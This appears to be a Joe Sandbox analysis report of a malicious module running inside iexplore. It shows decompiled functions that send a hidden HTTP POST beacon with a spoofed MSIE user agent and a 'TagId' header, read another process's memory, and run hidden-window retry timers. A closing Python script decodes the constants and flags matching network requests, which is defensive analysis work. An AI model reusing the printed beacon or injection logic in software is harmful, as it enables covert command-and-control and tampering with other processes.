72b24de7 1973->1932 1975 72b21835 1974->1975 1976 72b2185a WaitForSingleObject 1975->1976 1984 72b21868 1975->1984 1976->1984 1977 72b219bc 1979 72b21902 WaitForSingleObject 1979->1984 1980 72b215cc LeaveCriticalSection ResetEvent EnterCriticalSection RaiseException 1980->1984 1981 72b2162f 9 API calls 1981->1984 1982 72b2210c RaiseException 1982->1984 1984->1977 1984->1979 1984->1980 1984->1981 1984->1982 1985 72b22429 11 API calls 1984->1985 1986 72b2294c 1984->1986 1991 72b229e4 1984->1991 1985->1984 1988 72b2295b 1986->1988 1987 72b22970 wsprintfA 1989 72b229ab HttpSendRequestA 1987->1989 1988->1987 1990 72b229c6 1989->1990 1990->1984 1992 72b229f0 1991->1992 1993 72b22a56 lstrcpyA 1992->1993 1995 72b22a9a 1992->1995 1994 72b22a89 1993->1994 1994->1995 1996 72b22a8d lstrcpyA 1994->1996 1995->1984 1996->1995 1998 72b234b2 1997->1998 1999 72b234cf LocalAlloc 1998->1999 2000 72b234bf LocalFree 1998->2000 2001 72b23511 1999->2001 2000->2001 2001->1971 2003 72b21b58 2002->2003 2004 72b21b98 2003->2004 2005 72b21b8a LocalFree 2003->2005 2004->1973 2005->2003 2164 72b24e04 2165 72b24eaf 2164->2165 2166 72b24e29 2164->2166 2166->2165 2167 72b24e71 GetProcAddress 2166->2167 2168 72b24e67 GetModuleHandleA 2166->2168 2172 72b21b20 LocalAlloc 2166->2172 2173 72b24ef1 GetVersion 2166->2173 2175 72b21b01 2166->2175 2178 72b2175e RaiseException 2166->2178 2167->2166 2168->2166 2172->2166 2174 72b24f08 2173->2174 2174->2166 2179 72b21c40 2175->2179 2178->2166 2180 72b21b14 LocalFree 2179->2180 2180->2166 2184 72b21985 2185 72b219a5 2184->2185 2187 72b219af 2184->2187 2186 72b2278e 8 API calls 2185->2186 2186->2187 2188 72b2224a PostThreadMessageA 2087 72b21eeb 2088 72b21f12 2087->2088 2089 72b21ef4 2087->2089 2096 72b22266 SetServiceStatus 2088->2096 2089->2088 2090 72b21ef9 2089->2090 2095 72b22266 SetServiceStatus 2090->2095 2093 72b21f20 SetEvent 2094 72b21f10 2093->2094 2095->2094 2096->2093 2192 72b24acf 2194 72b24b0d 2192->2194 2193 72b24bcc 2194->2193 2195 72b24b9c 
RtlUnwind 2194->2195 2195->2194 2196 72b21d8d 2197 72b21e8c 3 API calls 2196->2197 2198 72b21d98 2197->2198

Executed Functions

Control-flow Graph

C-Code - Quality: 95%
			E72B22D7F(void** _a4, char* _a8, char* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				void* _t36;
				char* _t37;
				signed int _t44;
				void* _t52;
				void** _t55;

				_v8 = 0x4e20; // 20000 ms, applied below as INTERNET_OPTION_CONNECT_TIMEOUT
				_v12 = 0x493e0; // 300000 ms, applied below as INTERNET_OPTION_SEND_TIMEOUT
				_t31 = LoadLibraryA("wininet.dll"); // executed
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0x72b21574; // 0x72b21324 -- name table; the loop resolves 0x28 / 4 = 10 wininet exports by name into _t55[3..12]
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L72B22946();
						} else {
							_t37 = _a8;
						}
					_t36 = InternetConnectA( *_t55, _t37, 0x50, 0x72b211c4, 0x72b211c4, 3, 0, 0); // port 80, INTERNET_SERVICE_HTTP (3); user name and password point at the same string
					_t55[1] = _t36;
					if(_t36 != 0) {
						_t36 = _t55[9](_t36, "POST", 0x72b211c4, 0, 0, 0, 0x84400100, 0); // by argument shape HttpOpenRequestA; 0x84400100 = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE
						_t55[2] = _t36;
						if(_t36 != 0) {
							_t55[5](_t36, 2,  &_v8, 4); // by argument shape InternetSetOptionA; option 2 = INTERNET_OPTION_CONNECT_TIMEOUT (20000 ms)
							_t55[5](_t55[2], 5,  &_v12, 4); // option 5 = INTERNET_OPTION_SEND_TIMEOUT (300000 ms)
							wsprintfA( &_v44, "%s: 0\r\n", "TagId"); // fixed extra request header "TagId: 0"
							_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0); // by argument shape HttpSendRequestA; result mapped to 1 on success, -1 on failure below
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}














(per-line address column for the listing above, 0x72b22d8c to 0x72b22e99; disassembly text not captured)

APIs
  • LoadLibraryA.KERNEL32(wininet.dll,?,00000080,?,00000004,-00000004,00000000,?,00000000,00000080), ref: 72B22D9A
  • GetProcAddress.KERNEL32(?,72B21324), ref: 72B22DC6
  • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 7.0;),00000000,00000000,00000000,00000000,?,00000080,?,00000004,-00000004,00000000,?,00000000,00000080), ref: 72B22DEA
  • InternetConnectA.WININET(000493E0,00000000,00000050,72B211C4,72B211C4,00000003,00000000,00000000,00000080,?,00000080,?,00000004,-00000004,00000000,?), ref: 72B22E2A
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Internet$AddressConnectLibraryLoadOpenProc
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
  • API String ID: 2199918435-1135021940
  • Opcode ID: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction ID: a2a5ce718f49d85c2f3b8665ac83783b69dbef2134b55f7e38b1c01db8571e2a
  • Opcode Fuzzy Hash: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction Fuzzy Hash: 9B31C2B1500308BFEB21AF64CD89E5B7BFDFF48396B104929F65AD6590D330A854CB20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 98%
			E72B232DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t38;
				void* _t42;

				_t11 = GetVersion();
				_t33 = 0;
				 *0x72b260b0 = _t11;
				_t42 =  *0x72b2608c - _t33; // 0x1
				if(_t42 == 0 && _t11 < 0) { // GetVersion with the high bit set means a Windows 9x/Me kernel
					 *0x72b26038 =  *0x72b26038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4); // STD_ERROR_HANDLE (-12); this slot carries a process handle, used by ReadProcessMemory in E72B22314 and CreateRemoteThread in E72B21F95
				_t38 = E72B23420(_t12);
				if(_t38 == _t33) {
					L11:
					_t14 =  *0x72b26038; // 0x1
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t38 - _t33;
						if(_t38 != _t33) {
							L17:
							 *0x72b260ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E72B23161, _t33, _t33,  &_v16); // executed
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0x72b260ac; // 0x1b0
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0x72b260ac);
									 *0x72b260ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E72B22FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t38 - _t33;
					if(_t38 != _t33) {
						goto L17;
					}
					E72B21EDA();
					goto L23;
				} else {
					_t26 =  *0x72b26008; // 0x72b27204
					 *0x72b26004 = _t33;
					_t46 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0x72b26038 = 1;
						SetStdHandle(0xfffffff6, _v8); // mirror it into STD_INPUT_HANDLE (-10); E72B21F95 requires both slots to hold the same handle before it injects
						goto L11;
					}
					 *0x72b26038 = 2;
					_t34 = E72B22123(_t33, _t36, CloseHandle, _t38, _t46);
					_t29 =  *0x72b26008; // 0x72b27204
					 *(_t29 + 0x28) = 1;
					_t30 = E72B22ADB(_t34, _t35, _t36, CloseHandle, _t38, _t46, _t34);
					asm("sbb esi, esi");
					_t38 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t38 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E72B22FBB(_t35, _t38);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}



















(per-line address column for the listing above, 0x72b232e7 to 0x72b23419; disassembly text not captured)

APIs
  • GetVersion.KERNEL32 ref: 72B232E7
  • GetStdHandle.KERNEL32(000000F4), ref: 72B23309
  • CloseHandle.KERNEL32(00000000), ref: 72B23363
  • SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 72B23385
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 72B233B5
  • CreateThread.KERNEL32(00000000,00000000,Function_00003161,00000000,00000000,?), ref: 72B233CD
  • WaitForSingleObject.KERNEL32(000001B0,000000FF), ref: 72B233EC
  • CloseHandle.KERNEL32 ref: 72B233F4
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B23401
  • CloseHandle.KERNEL32(?), ref: 72B23406
  • CloseHandle.KERNEL32(?,00000000), ref: 72B23416
  • ExitProcess.KERNEL32 ref: 72B23419
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
  • String ID:
  • API String ID: 2472693224-0
  • Opcode ID: e6fc5641f30b28ea52a77f4172d85290c361ad5936020697f046fc1cd2347553
  • Instruction ID: 016aedef878e6635e219e695dc34082c73d5b5be0daf8870531cd6c57efd487a
  • Opcode Fuzzy Hash: e6fc5641f30b28ea52a77f4172d85290c361ad5936020697f046fc1cd2347553
  • Instruction Fuzzy Hash: 3A310072440314EFCB216F6ACDC4A4B3EF8DB443E67224A2DE51AE3152D7304D89DB54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B2351D(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				int _t16;
				long _t17;
				void* _t18;
				int _t19;
				void* _t20;
				void* _t23;
				int _t26;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t35;
				struct HWND__* _t37;

				_t35 = __edx;
				_t37 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t37, 0x64); // timer id 100
					do {
						_t16 = PeekMessageA( &_v32, _t37, 0x113, 0x113, 1); // drain queued WM_TIMER (0x113) messages, PM_REMOVE
						__eflags = _t16;
					} while (_t16 != 0);
					PostQuitMessage(_t31);
					__eflags = _a8 - 0x11;
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t37, _a8, _a12, _a16);
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0x72b26088 = 1;
					 *0x72b2602c = _t31;
					 *0x72b260b8 = _t31;
					L11:
					_t19 = E72B22EA1(_t34, _a16);
					__eflags = _t19;
					if(_t19 == 0) {
						_t20 =  *0x72b260ac; // 0x1b0
						__eflags = _t20 - _t31;
						if(_t20 != _t31) {
							 *0x72b26088 = 1;
							SetEvent(_t20);
						}
						__eflags =  *0x72b26088 - _t31; // 0x0
						if(__eflags != 0) {
							goto L17;
						} else {
							SetTimer(_t37, 0x64, 0xdbba0, _t31); // re-arm: 0xdbba0 = 900000 ms = 15 min
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t37, 0x64); // timer id 100 fired: stop it while the work runs
					do {
						_t26 = PeekMessageA( &_v32, _t37, 0x113, 0x113, 1); // drain queued WM_TIMER messages
						__eflags = _t26;
					} while (_t26 != 0);
					E72B2327B(_t34, _t35, _t37, 0x113); // executed
					__eflags =  *0x72b26038; // 0x1
					if(__eflags == 0) {
						SetTimer(_t37, 0x64, 0xdbba0, 0); // 900000 ms = 15 min
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}


















(per-line address column for the listing above, 0x72b2351d to 0x72b23636; disassembly text not captured)

APIs
  • KillTimer.USER32(?,00000064), ref: 72B2355C
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B23570
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B23596
  • SetEvent.KERNEL32(000001B0), ref: 72B235D5
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B235EC
  • KillTimer.USER32(?,00000064), ref: 72B235F7
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B2360B
  • PostQuitMessage.USER32(00000000), ref: 72B23616
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 72B2362C
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
  • String ID: d
  • API String ID: 2149785620-2564639436
  • Opcode ID: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction ID: 41688d1bd847d3f0796b27d825ea33bda349e247ae9f5fafea2125377e32a201
  • Opcode Fuzzy Hash: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction Fuzzy Hash: C731D132690314ABE7225A29CC8AF9B3AFDEB45797F11081CF50ED2183D3718558DB21
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 84%
			E72B22314() {
				int _t42;
				int _t45;
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0x72b253c8);
				E72B24A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4); // STD_ERROR_HANDLE, used as a process handle below (see E72B232DE)
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				_t42 = ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34); // executed; 16-byte record header read from the other process
				if(_t42 == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				_t45 = ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34); // executed
				if(_t45 == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34); // executed
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E72B215CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E72B2162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}
















(per-line address column for the listing above, 0x72b22314 to 0x72b22422; disassembly text not captured)

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22329
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2234A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22363
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22394
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2239C
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 72B223BF
  • ExitThread.KERNEL32 ref: 72B22422
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: MemoryProcessRead$Event$ExitHandleResetThread
  • String ID: x
  • API String ID: 2307309678-2363233923
  • Opcode ID: 0270a9b1eb6f4bfed88db63639d28868d063afc6ed73b52d124a0367130b2273
  • Instruction ID: 39cbffadf330a72c51dfe75118ffe555f1184d41082d0e839d6b4843e77be50f
  • Opcode Fuzzy Hash: 0270a9b1eb6f4bfed88db63639d28868d063afc6ed73b52d124a0367130b2273
  • Instruction Fuzzy Hash: 3E313A71910319EFEB11CBA9CE84EEEBBF9FB08316F104129E516F2091D774AA45CB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 82%
			E72B23161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				struct HWND__* _t14;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x72b25430);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x72b260c4; // 0x72b20000
				 *0x72B26070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x72B26084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103); // the module path doubles as the window class name below
				RegisterClassA(0x72b26060); // executed
				_t14 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0); // executed; style 0x80000 = WS_SYSMENU, no ShowWindow call in this function
				 *0x72b2600c = _t14;
				_t15 =  *0x72b26038; // 0x1
				asm("sbb eax, eax");
				SetTimer( *0x72b2600c, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0); // executed; sbb idiom: 0xffff1d70 + 0xea60 wraps to 2000 ms when *0x72b26038 != 0 (as here), 60000 ms when it is 0
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34); // executed
				}
				 *0x72b2600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E72B2159C(0, _t30);
			}








(per-line address column for the listing above, 0x72b23161 to 0x72b23220; disassembly text not captured)

APIs
  • GetModuleFileNameA.KERNEL32(72B20000,?,00000103,72B26060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,72B20000,00000000), ref: 72B231A5
  • RegisterClassA.USER32 ref: 72B231AB
  • CreateWindowExA.USER32 ref: 72B231B1
  • SetTimer.USER32(00000064,-0000EA5F,00000000), ref: 72B231D9
  • GetMessageA.USER32 ref: 72B231E6
  • TranslateMessage.USER32(?), ref: 72B231F4
  • DispatchMessageA.USER32 ref: 72B231FE
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
  • String ID:
  • API String ID: 2359640614-0
  • Opcode ID: 78df0df3dc89c525d75cd91ed21fe3ae8a5e16b9aebee664f3239ca738d4170b
  • Instruction ID: 29b8b4f74a95a23194c38b4f8543aa8665ab8fa1b511f83a033bb6963feef6d0
  • Opcode Fuzzy Hash: 78df0df3dc89c525d75cd91ed21fe3ae8a5e16b9aebee664f3239ca738d4170b
  • Instruction Fuzzy Hash: 991160B2990314EFD7209F66CC89E6B7BFCFB95782B21491DB405D3182D7304944CB20
Uniqueness

Uniqueness Score: -1.00%
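
The listings above leave the reader to decode the magic numbers by hand: the WinINet flags and option IDs in E72B22D7F, the timer arithmetic in E72B23161 and E72B2351D, and the GetStdHandle/SetStdHandle slot numbers in E72B232DE. The following is an added example, not part of the Joe Sandbox report and not the sample's own code: it maps those constants to their Windows SDK names, assembles the resulting beacon profile, and applies the three fixed request traits (POST, the MSIE 7.0 user agent, a TagId header) to HTTP request heads as a simple network indicator. The SDK names and the neg/sbb reading of the decompiler's `~x` are standard Windows facts; the identification of the `_t55[]` function pointers as HttpOpenRequestA, InternetSetOptionA and HttpSendRequestA is inferred from their argument shapes and not stated on the page; the sample requests at the bottom are constructed for the demonstration, not captured from the run.

```python
"""Decode the WinINet, timer and std-handle constants from the decompiled rpcnetp module."""

# Values copied from the decompiled listings on this page.
USER_AGENT = "Mozilla/4.0 (compatible; MSIE 7.0;)"
EXTRA_HEADER = "TagId: 0"
OPEN_REQUEST_FLAGS = 0x84400100   # HttpOpenRequestA dwFlags in E72B22D7F
CONNECT_TIMEOUT = 0x4E20          # _v8, InternetSetOptionA option 2
SEND_TIMEOUT = 0x493E0            # _v12, InternetSetOptionA option 5
RETRY_TIMER = 0xDBBA0             # SetTimer interval in E72B2351D
TIMER_ID = 0x64

# Names from the Windows SDK (wininet.h, winbase.h).
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT", 6: "INTERNET_OPTION_RECEIVE_TIMEOUT"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
STD_HANDLES = {0xFFFFFFF6: "STD_INPUT_HANDLE", 0xFFFFFFF5: "STD_OUTPUT_HANDLE", 0xFFFFFFF4: "STD_ERROR_HANDLE"}


def decode_flags(value):
    """Split an HttpOpenRequest dwFlags word into SDK names; also return any bits the table does not explain."""
    names = [name for bit, name in sorted(INTERNET_FLAGS.items(), reverse=True) if value & bit]
    known = 0
    for bit in INTERNET_FLAGS:
        if value & bit:
            known |= bit
    return names, (value & ~known) & 0xFFFFFFFF


def sbb_mask(x):
    """The neg / sbb eax,eax idiom the decompiler prints as ~x: 0xFFFFFFFF when x != 0, else 0."""
    return 0xFFFFFFFF if x != 0 else 0


def initial_timer_ms(mode):
    """SetTimer interval from E72B23161: (sbb_mask(mode) & 0xffff1d70) + 0xea60 with 32-bit wrap."""
    return ((sbb_mask(mode) & 0xFFFF1D70) + 0xEA60) & 0xFFFFFFFF


def send_request_result(api_return):
    """Return value of E72B22D7F after HttpSendRequestA: (sbb_mask(ret) & 2) - 1, i.e. 1 on success, -1 on failure."""
    return (sbb_mask(api_return) & 2) - 1


def beacon_profile(mode=1):
    """Human-readable summary of the connection E72B22D7F sets up; mode is the global at 0x72b26038 (1 in this run)."""
    flags, leftover = decode_flags(OPEN_REQUEST_FLAGS)
    return {
        "transport": INTERNET_SERVICE[3],      # InternetConnectA service argument 3
        "port": 0x50,                          # InternetConnectA port argument
        "method": "POST",
        "user_agent": USER_AGENT,
        "extra_header": EXTRA_HEADER,
        "open_request_flags": flags,
        "unexplained_flag_bits": leftover,
        INTERNET_OPTIONS[2]: CONNECT_TIMEOUT,
        INTERNET_OPTIONS[5]: SEND_TIMEOUT,
        "first_timer_ms": initial_timer_ms(mode),
        "retry_timer_ms": RETRY_TIMER,
        "timer_id": TIMER_ID,
    }


def parse_request(raw):
    """Minimal HTTP/1.x request-head parser: (method, target, headers with lower-cased names) or None."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            return None
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def looks_like_beacon(raw):
    """True when a request carries the fixed traits of E72B22D7F: POST, this user agent, a TagId header."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, _target, headers = parsed
    return method == "POST" and headers.get("user-agent") == USER_AGENT and "tagid" in headers


# Constructed sample traffic (not captured from the sandbox run): one matching request, two benign ones.
SAMPLE_REQUESTS = [
    "POST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)\r\nHost: example.invalid\r\nTagId: 0\r\nContent-Length: 0\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)\r\nHost: example.invalid\r\n\r\n",
    "POST /api HTTP/1.1\r\nUser-Agent: curl/8.0\r\nHost: example.invalid\r\nTagId: 0\r\n\r\n",
]


def flag_samples(requests=SAMPLE_REQUESTS):
    """Indexes of the requests that match the beacon traits."""
    return [i for i, r in enumerate(requests) if looks_like_beacon(r)]


if __name__ == "__main__":
    for key, value in beacon_profile().items():
        print(f"{key}: {value}")
    print("beacon-like requests:", flag_samples())
```

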